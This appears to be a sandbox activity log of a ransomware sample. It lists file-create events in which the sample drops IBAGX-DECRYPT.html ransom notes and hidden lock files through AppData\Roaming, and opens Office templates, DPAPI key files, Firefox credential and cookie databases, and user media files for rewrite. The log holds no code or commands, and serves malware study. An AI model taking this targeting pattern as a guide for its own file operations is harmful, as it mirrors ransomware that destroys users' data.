Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Proof\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Proof\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\CREDHIST desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\a5a8c4cf-064f-463d-8c91-f4df942efa7a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\b803cc0b-9e6a-422e-8340-ccf853f96967 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\d418ef6b-4b3f-4eb8-bc3b-d8f570853793 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\f8b51922-782c-4671-ac20-383d1db7c4fb desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\Preferred desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\SYNCHIST desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Publisher\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Publisher\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Publisher Building Blocks\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Publisher Building Blocks\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Speech\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Speech\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Templates\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Templates\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Templates\Normal.dotm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Templates\NormalEmail.dotm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\UProof\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\UProof\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Word\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Word\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Word\STARTUP\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Word\STARTUP\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\mkuwVg_9_85.csv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Extensions\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Extensions\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Crash Reports\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Crash Reports\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\addons.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\bookmarkbackups\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\bookmarkbackups\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\bookmarkbackups\bookmarks-2017-05-31_5.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\bookmarkbackups\bookmarks-2017-07-12_5.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cert8.db desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\compatibility.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\content-prefs.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\downloads.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\extensions.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\extensions.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\healthreport\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\healthreport\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\healthreport.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\idb\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\idb\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key3.db desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\localstore.rdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\marionette.log desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\mimeTypes.rdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\minidumps\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\minidumps\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\permissions.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\places.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\pluginreg.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\prefs.js desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\search.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\secmod.db desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\sessionstore.bak desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\sessionstore.js desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\times.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\urlclassifierkey3.txt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\webapps\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\webapps\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\webapps\webapps.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\webappsstore.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\profiles.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\neRXu5W1eg3y OKCcvRv.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Ni59WhMAyCR0XMs.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\otN-.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\PXz5XXpR.doc desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\qCC6mI5WZM3RY.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\RQOxouJFh.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\tktu22R-b1SHP8kj.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\UiO1wT5wrfOaDEHA.csv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\vrXyp.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\vyDzPY.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\ybXOoHI.odp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
